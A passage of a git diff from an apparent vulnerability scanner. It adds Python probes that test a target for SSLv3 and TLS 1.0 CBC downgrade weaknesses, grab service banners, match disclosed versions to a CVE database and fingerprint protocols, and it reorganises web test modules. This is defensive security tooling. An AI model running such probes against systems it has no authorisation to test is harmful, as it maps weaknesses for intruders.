remediation="Upgrade OpenSSL to 1.0.1g or later and regenerate all private keys and certificates.", + owasp_id="A06:2021", + cwe_id="CWE-126", + confidence="certain", + ) + except Exception: + pass + return None + + def _tls_check_downgrade(self, target, port): + """Test for TLS downgrade vulnerabilities (POODLE, BEAST). + + Returns list of findings. + """ + findings = [] + + # --- POODLE: Test SSLv3 acceptance --- + try: + ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) + ctx.check_hostname = False + ctx.verify_mode = ssl.CERT_NONE + ctx.maximum_version = ssl.TLSVersion.SSLv3 + ctx.minimum_version = ssl.TLSVersion.SSLv3 + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + tls_sock = ctx.wrap_socket(sock, server_hostname=target) + negotiated = tls_sock.version() + tls_sock.close() + if negotiated and "SSL" in negotiated: + findings.append(Finding( + severity=Severity.HIGH, + title="Server accepts SSLv3 — vulnerable to POODLE (CVE-2014-3566)", + description=f"TLS on {target}:{port} accepts SSLv3 connections. " + "The POODLE attack allows decrypting SSLv3 traffic using CBC cipher padding oracles.", + evidence=f"Negotiated {negotiated} when SSLv3 was forced.", + remediation="Disable SSLv3 entirely on the server.", + owasp_id="A02:2021", + cwe_id="CWE-757", + confidence="certain", + )) + except (ssl.SSLError, OSError): + pass # SSLv3 rejected or not available in runtime — good + + # --- BEAST: Test TLS 1.0 with CBC cipher --- + try: + ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) + ctx.check_hostname = False + ctx.verify_mode = ssl.CERT_NONE + ctx.maximum_version = ssl.TLSVersion.TLSv1 + ctx.minimum_version = ssl.TLSVersion.TLSv1 + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + tls_sock = ctx.wrap_socket(sock, server_hostname=target) + negotiated = tls_sock.version() + cipher_info = tls_sock.cipher() + tls_sock.close() + if negotiated and cipher_info: + cipher_name = cipher_info[0] if cipher_info else "" + if "CBC" in cipher_name.upper(): + findings.append(Finding( + severity=Severity.MEDIUM, + title="TLS 1.0 with CBC cipher — BEAST risk (CVE-2011-3389)", + description=f"TLS on {target}:{port} accepts TLS 1.0 with CBC-mode cipher '{cipher_name}'. " + "The BEAST attack exploits predictable IVs in TLS 1.0 CBC mode.", + evidence=f"Negotiated {negotiated} with cipher {cipher_name}.", + remediation="Disable TLS 1.0 or ensure only non-CBC ciphers are used with TLS 1.0.", + owasp_id="A02:2021", + cwe_id="CWE-327", + confidence="certain", + )) + except (ssl.SSLError, OSError): + pass # TLS 1.0 rejected — good + + return findings + + # Product patterns for generic banner version extraction. + # Maps regex → CVE DB product name. Each regex must have a named group 'ver'. + _GENERIC_BANNER_PATTERNS = [ + (_re.compile(r'OpenSSH[_\s](?P\d+\.\d+(?:\.\d+)?)', _re.I), "openssh"), + (_re.compile(r'Apache[/ ](?P\d+\.\d+(?:\.\d+)?)', _re.I), "apache"), + (_re.compile(r'nginx[/ ](?P\d+\.\d+(?:\.\d+)?)', _re.I), "nginx"), + (_re.compile(r'Exim\s+(?P\d+\.\d+(?:\.\d+)?)', _re.I), "exim"), + (_re.compile(r'Postfix[/ ]?(?:.*?smtpd)?\s*(?P\d+\.\d+(?:\.\d+)?)', _re.I), "postfix"), + (_re.compile(r'ProFTPD\s+(?P\d+\.\d+(?:\.\d+)?)', _re.I), "proftpd"), + (_re.compile(r'vsftpd\s+(?P\d+\.\d+(?:\.\d+)?)', _re.I), "vsftpd"), + (_re.compile(r'Redis[/ ](?:server\s+)?v?(?P\d+\.\d+(?:\.\d+)?)', _re.I), "redis"), + (_re.compile(r'Samba\s+(?P\d+\.\d+(?:\.\d+)?)', _re.I), "samba"), + (_re.compile(r'Asterisk\s+(?P\d+\.\d+(?:\.\d+)?)', _re.I), "asterisk"), + (_re.compile(r'MySQL[/ ](?P\d+\.\d+(?:\.\d+)?)', _re.I), "mysql"), + (_re.compile(r'PostgreSQL\s+(?P\d+\.\d+(?:\.\d+)?)', _re.I), "postgresql"), + (_re.compile(r'MongoDB\s+(?P\d+\.\d+(?:\.\d+)?)', _re.I), "mongodb"), + (_re.compile(r'Elasticsearch[/ ](?P\d+\.\d+(?:\.\d+)?)', _re.I), "elasticsearch"), + (_re.compile(r'memcached\s+(?P\d+\.\d+(?:\.\d+)?)', _re.I), "memcached"), + (_re.compile(r'TightVNC[/ ](?P\d+\.\d+(?:\.\d+)?)', _re.I), "tightvnc"), + ] + + def _service_info_generic(self, target, port): + """ + Attempt a generic TCP banner grab for uncovered ports. + + Performs three checks on the banner: + 1. Version disclosure — flags any product/version string as info leak. + 2. CVE matching — runs extracted versions against the CVE database. + 3. Unauthenticated data exposure — flags services that send data + without any client request (potential auth bypass). + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw = {"banner": None} + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(2) + sock.connect((target, port)) + raw_bytes = sock.recv(512) + sock.close() + if not raw_bytes: + return None + except Exception as e: + return probe_error(target, port, "generic", e) + + # --- Protocol fingerprinting: detect known services on non-standard ports --- + reclassified = self._generic_fingerprint_protocol(raw_bytes, target, port) + if reclassified is not None: + return reclassified + + # --- Standard banner analysis for truly unknown services --- + data = raw_bytes.decode('utf-8', errors='ignore') + banner = ''.join(ch if 32 <= ord(ch) < 127 else '.' for ch in data) + readable = banner.strip().replace('.', '') + if not readable: + return None + raw["banner"] = banner.strip() + banner_text = raw["banner"] + + # --- 1. Version extraction + CVE check --- + for pattern, product in self._GENERIC_BANNER_PATTERNS: + m = pattern.search(banner_text) + if m: + version = m.group("ver") + raw["product"] = product + raw["version"] = version + findings.append(Finding( + severity=Severity.LOW, + title=f"Service version disclosed: {product} {version}", + description=f"Banner on {target}:{port} reveals {product} {version}. " + "Version disclosure aids attackers in targeting known vulnerabilities.", + evidence=f"Banner: {banner_text[:80]}", + remediation="Suppress or genericize the service banner.", + cwe_id="CWE-200", + confidence="certain", + )) + findings += check_cves(product, version) + break # First match wins + + return probe_result(raw_data=raw, findings=findings) + + # Protocol signatures for reclassifying services on non-standard ports. + # Each entry: (check_function, protocol_name, probe_method_name) + # Check functions receive raw bytes and return True if matched. + @staticmethod + def _is_redis_banner(data): + """Redis RESP: starts with +, -, :, $, or * (protocol type bytes).""" + return len(data) > 0 and data[0:1] in (b'+', b'-', b'$', b'*', b':') + + @staticmethod + def _is_ftp_banner(data): + """FTP: 220 greeting.""" + return data[:4] in (b'220 ', b'220-') + + @staticmethod + def _is_smtp_banner(data): + """SMTP: 220 greeting with SMTP/ESMTP keyword.""" + text = data[:200].decode('utf-8', errors='ignore').upper() + return text.startswith('220') and ('SMTP' in text or 'ESMTP' in text) + + @staticmethod + def _is_mysql_handshake(data): + """MySQL: 3-byte length + seq + protocol version 0x0a.""" + if len(data) > 4: + payload = data[4:] + return payload[0:1] == b'\x0a' + return False + + @staticmethod + def _is_rsync_banner(data): + """Rsync: @RSYNCD: version.""" + return data.startswith(b'@RSYNCD:') + + @staticmethod + def _is_telnet_banner(data): + """Telnet: IAC (0xFF) followed by WILL/WONT/DO/DONT.""" + return len(data) >= 2 and data[0] == 0xFF and data[1] in (0xFB, 0xFC, 0xFD, 0xFE) + + _PROTOCOL_SIGNATURES = None # lazy init to avoid forward reference issues + + def _generic_fingerprint_protocol(self, raw_bytes, target, port): + """Try to identify the protocol from raw banner bytes. + + If a known protocol is detected, reclassifies the port and runs the + appropriate specialized probe directly. + + Returns + ------- + dict or None + Probe result from the specialized probe, or None if no match. + """ + signatures = [ + (self._is_redis_banner, "redis", "_service_info_redis"), + (self._is_ftp_banner, "ftp", "_service_info_ftp"), + (self._is_smtp_banner, "smtp", "_service_info_smtp"), + (self._is_mysql_handshake, "mysql", "_service_info_mysql"), + (self._is_rsync_banner, "rsync", "_service_info_rsync"), + (self._is_telnet_banner, "telnet", "_service_info_telnet"), + ] + + for check_fn, proto, method_name in signatures: + try: + if check_fn(raw_bytes): + # Reclassify port protocol for future reference + port_protocols = self.state.get("port_protocols", {}) + old_proto = port_protocols.get(port, "unknown") + port_protocols[port] = proto + self.P(f"Protocol reclassified: port {port} {old_proto} → {proto} (banner fingerprint)") + + # Run the specialized probe directly + probe_fn = getattr(self, method_name, None) + if probe_fn: + return probe_fn(target, port) + except Exception: + continue + return None diff --git a/extensions/business/cybersec/red_mesh/worker/web/__init__.py b/extensions/business/cybersec/red_mesh/worker/web/__init__.py new file mode 100644 index 00000000..0db9a024 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/worker/web/__init__.py @@ -0,0 +1,14 @@ +from .discovery import _WebDiscoveryMixin +from .hardening import _WebHardeningMixin +from .api_exposure import _WebApiExposureMixin +from .injection import _WebInjectionMixin + + +class _WebTestsMixin( + _WebDiscoveryMixin, + _WebHardeningMixin, + _WebApiExposureMixin, + _WebInjectionMixin, +): + """Combined web tests mixin.""" + pass diff --git a/extensions/business/cybersec/red_mesh/web_api_mixin.py b/extensions/business/cybersec/red_mesh/worker/web/api_exposure.py similarity index 99% rename from extensions/business/cybersec/red_mesh/web_api_mixin.py rename to extensions/business/cybersec/red_mesh/worker/web/api_exposure.py index a0aef396..0e3f18b0 100644 --- a/extensions/business/cybersec/red_mesh/web_api_mixin.py +++ b/extensions/business/cybersec/red_mesh/worker/web/api_exposure.py @@ -1,6 +1,6 @@ import requests -from .findings import Finding, Severity, probe_result, probe_error +from ...findings import Finding, Severity, probe_result, probe_error class _WebApiExposureMixin: diff --git a/extensions/business/cybersec/red_mesh/web_discovery_mixin.py b/extensions/business/cybersec/red_mesh/worker/web/discovery.py similarity index 99% rename from extensions/business/cybersec/red_mesh/web_discovery_mixin.py rename to extensions/business/cybersec/red_mesh/worker/web/discovery.py index e2c50fc8..7b607308 100644 --- a/extensions/business/cybersec/red_mesh/web_discovery_mixin.py +++ b/extensions/business/cybersec/red_mesh/worker/web/discovery.py @@ -2,8 +2,8 @@ import uuid as _uuid import requests -from .findings import Finding, Severity, probe_result, probe_error -from .cve_db import check_cves +from ...findings import Finding, Severity, probe_result, probe_error +from ...cve_db import check_cves class _WebDiscoveryMixin: diff --git a/extensions/business/cybersec/red_mesh/web_hardening_mixin.py b/extensions/business/cybersec/red_mesh/worker/web/hardening.py similarity index 99% rename from extensions/business/cybersec/red_mesh/web_hardening_mixin.py rename to extensions/business/cybersec/red_mesh/worker/web/hardening.py index de71f85f..1c085fad 100644 --- a/extensions/business/cybersec/red_mesh/web_hardening_mixin.py +++ b/extensions/business/cybersec/red_mesh/worker/web/hardening.py @@ -4,7 +4,7 @@ import requests from urllib.parse import quote -from .findings import Finding, Severity, probe_result, probe_error +from ...findings import Finding, Severity, probe_result, probe_error class _WebHardeningMixin: diff --git a/extensions/business/cybersec/red_mesh/web_injection_mixin.py b/extensions/business/cybersec/red_mesh/worker/web/injection.py similarity index 99% rename from extensions/business/cybersec/red_mesh/web_injection_mixin.py rename to extensions/business/cybersec/red_mesh/worker/web/injection.py index f5a77baa..f857b69b 100644 --- a/extensions/business/cybersec/red_mesh/web_injection_mixin.py +++ b/extensions/business/cybersec/red_mesh/worker/web/injection.py @@ -3,7 +3,7 @@ import requests from urllib.parse import quote -from .findings import Finding, Severity, probe_result, probe_error +from ...findings import Finding, Severity, probe_result, probe_error class _InjectionTestBase: